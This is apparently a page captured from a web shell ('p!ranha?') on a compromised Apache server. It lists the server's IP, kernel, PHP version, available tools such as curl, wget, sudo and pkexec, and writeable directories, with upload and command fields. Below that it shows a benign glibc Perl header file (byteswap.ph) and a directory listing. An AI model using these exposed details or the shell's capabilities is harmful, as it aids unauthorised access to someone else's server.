p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib64/perl5/bits/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /lib64/perl5/bits/byteswap.ph
require '_h2ph_pre.ph';

no warnings qw(redefine misc);

if(!defined (&_BYTESWAP_H)  && !defined (&_NETINET_IN_H)  && !defined (&_ENDIAN_H)) {
    die("Never use <bits/byteswap.h> directly; include <byteswap.h> instead.");
}
unless(defined(&_BITS_BYTESWAP_H)) {
    eval 'sub _BITS_BYTESWAP_H () {1;}' unless defined(&_BITS_BYTESWAP_H);
    require 'features.ph';
    require 'bits/types.ph';
    require 'bits/wordsize.ph';
    eval 'sub __bswap_constant_16 {
        my($x) = @_;
	    eval q(( (((($x) >> 8) & 0xff) | ((($x) & 0xff) << 8))));
    }' unless defined(&__bswap_constant_16);
    require 'bits/byteswap-16.ph';
    eval 'sub __bswap_constant_32 {
        my($x) = @_;
	    eval q((((($x) & 0xff000000) >> 24) | ((($x) & 0xff0000) >> 8) | ((($x) & 0xff00) << 8) | ((($x) & 0xff) << 24)));
    }' unless defined(&__bswap_constant_32);
    if(defined(&__GNUC__)) {
	if( &__GNUC_PREREQ (4, 3)) {
	    eval 'sub __bswap_32 {
	        my($__bsx) = @_;
    		eval q({  &__builtin_bswap32 ($__bsx); });
	    }' unless defined(&__bswap_32);
	}
 elsif((defined(&__GNUC__) ? &__GNUC__ : undef) >= 2) {
	    if((defined(&__WORDSIZE) ? &__WORDSIZE : undef) == 64|| (defined (&__i486__) || defined (&__pentium__) || defined (&__pentiumpro__) || defined (&__pentium4__) || defined (&__k8__) || defined (&__athlon__) || defined (&__k6__) || defined (&__nocona__) || defined (&__core2__) || defined (&__geode__) || defined (&__amdfam10__))) {
		eval 'sub __bswap_32 {
		    my($x) = @_;
    		    eval q(\\"(assembly code)\\");
		}' unless defined(&__bswap_32);
	    } else {
		eval 'sub __bswap_32 {
		    my($x) = @_;
    		    eval q(\\"(assembly code)\\");
		}' unless defined(&__bswap_32);
	    }
	} else {
	    eval 'sub __bswap_32 {
	        my($x) = @_;
    		eval q(( &__extension__ ({ \'unsigned int __x\' = ($x);  &__bswap_constant_32 ( &__x); })));
	    }' unless defined(&__bswap_32);
	}
    } else {
	eval 'sub __bswap_32 {
	    my($__bsx) = @_;
    	    eval q({  &__bswap_constant_32 ($__bsx); });
	}' unless defined(&__bswap_32);
    }
    if( &__GNUC_PREREQ (2, 0)) {
	eval 'sub __bswap_constant_64 {
	    my($x) = @_;
    	    eval q(( &__extension__ (((($x) & 0xff00000000000000) >> 56) | ((($x) & 0xff000000000000) >> 40) | ((($x) & 0xff0000000000) >> 24) | ((($x) & 0xff00000000) >> 8) | ((($x) & 0xff000000) << 8) | ((($x) & 0xff0000) << 24) | ((($x) & 0xff00) << 40) | ((($x) & 0xff) << 56))));
	}' unless defined(&__bswap_constant_64);
	if( &__GNUC_PREREQ (4, 3)) {
	    eval 'sub __bswap_64 {
	        my($__bsx) = @_;
    		eval q({  &__builtin_bswap64 ($__bsx); });
	    }' unless defined(&__bswap_64);
	}
 elsif((defined(&__WORDSIZE) ? &__WORDSIZE : undef) == 64) {
	    eval 'sub __bswap_64 {
	        my($x) = @_;
    		eval q(\\"(assembly code)\\");
	    }' unless defined(&__bswap_64);
	} else {
	    eval 'sub __bswap_64 {
	        my($x) = @_;
    		eval q(( &__extension__ ({ \'union union\' {  &__extension__  &__uint64_t  &__ll; \'unsigned int __l\'[2]; }  &__w,  &__r;  &if ( &__builtin_constant_p ($x))  ($__r->{__ll}) =  &__bswap_constant_64 ($x);  &else {  ($__w->{__ll}) = ($x);  ($__r->{__l[0]}) =  &__bswap_32 ( ($__w->{__l[1]}));  ($__r->{__l[1]}) =  &__bswap_32 ( ($__w->{__l[0]})); }  ($__r->{__ll}); })));
	    }' unless defined(&__bswap_64);
	}
    }
 elsif((defined(&__GLIBC_HAVE_LONG_LONG) ? &__GLIBC_HAVE_LONG_LONG : undef)) {
	eval 'sub __bswap_constant_64 {
	    my($x) = @_;
    	    eval q((((($x) & 0xff00000000000000) >> 56) | ((($x) & 0xff000000000000) >> 40) | ((($x) & 0xff0000000000) >> 24) | ((($x) & 0xff00000000) >> 8) | ((($x) & 0xff000000) << 8) | ((($x) & 0xff0000) << 24) | ((($x) & 0xff00) << 40) | ((($x) & 0xff) << 56)));
	}' unless defined(&__bswap_constant_64);
	eval 'sub __bswap_64 {
	    my($__bsx) = @_;
    	    eval q({  &__bswap_constant_64 ($__bsx); });
	}' unless defined(&__bswap_64);
    }
}
1;
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
January 19 2024 08:12:45
0 / 0
0755
byteswap-16.ph
0.713 KB
February 02 2021 16:33:01
0 / 0
0644
byteswap.ph
3.787 KB
February 02 2021 16:33:01
0 / 0
0644
endian.ph
0.241 KB
February 02 2021 16:33:01
0 / 0
0644
ioctl-types.ph
1.723 KB
February 02 2021 16:32:59
0 / 0
0644
ioctls.ph
3.737 KB
February 02 2021 16:32:59
0 / 0
0644
pthreadtypes.ph
3.925 KB
February 02 2021 16:33:00
0 / 0
0644
select.ph
1.356 KB
February 02 2021 16:33:00
0 / 0
0644
select2.ph
0.479 KB
February 02 2021 16:33:00
0 / 0
0644
sigaction.ph
1.505 KB
February 02 2021 16:33:00
0 / 0
0644
sigcontext.ph
0.84 KB
February 02 2021 16:33:00
0 / 0
0644
siginfo.ph
6.787 KB
February 02 2021 16:33:00
0 / 0
0644
signum.ph
2.764 KB
February 02 2021 16:33:00
0 / 0
0644
sigset.ph
2.99 KB
February 02 2021 16:33:00
0 / 0
0644
sigstack.ph
0.398 KB
February 02 2021 16:33:00
0 / 0
0644
sigthread.ph
0.338 KB
February 02 2021 16:33:00
0 / 0
0644
sockaddr.ph
0.495 KB
February 02 2021 16:33:00
0 / 0
0644
socket.ph
12.271 KB
February 02 2021 16:33:00
0 / 0
0644
socket2.ph
0.173 KB
February 02 2021 16:33:00
0 / 0
0644
socket_type.ph
0.748 KB
February 02 2021 16:33:00
0 / 0
0644
syscall.ph
73.149 KB
February 02 2021 16:32:57
0 / 0
0644
syslog-ldbl.ph
0.345 KB
February 02 2021 16:32:58
0 / 0
0644
syslog-path.ph
0.354 KB
February 02 2021 16:32:58
0 / 0
0644
syslog.ph
0.394 KB
February 02 2021 16:32:58
0 / 0
0644
time.ph
1.757 KB
February 02 2021 16:33:01
0 / 0
0644
timex.ph
3.033 KB
February 02 2021 16:33:01
0 / 0
0644
types.ph
2.508 KB
February 02 2021 16:33:00
0 / 0
0644
typesizes.ph
3.872 KB
February 02 2021 16:33:00
0 / 0
0644
uio.ph
0.567 KB
February 02 2021 16:33:00
0 / 0
0644
waitflags.ph
0.714 KB
February 02 2021 16:33:00
0 / 0
0644
waitstatus.ph
2.522 KB
February 02 2021 16:33:00
0 / 0
0644
wordsize.ph
0.446 KB
February 02 2021 16:33:01
0 / 0
0644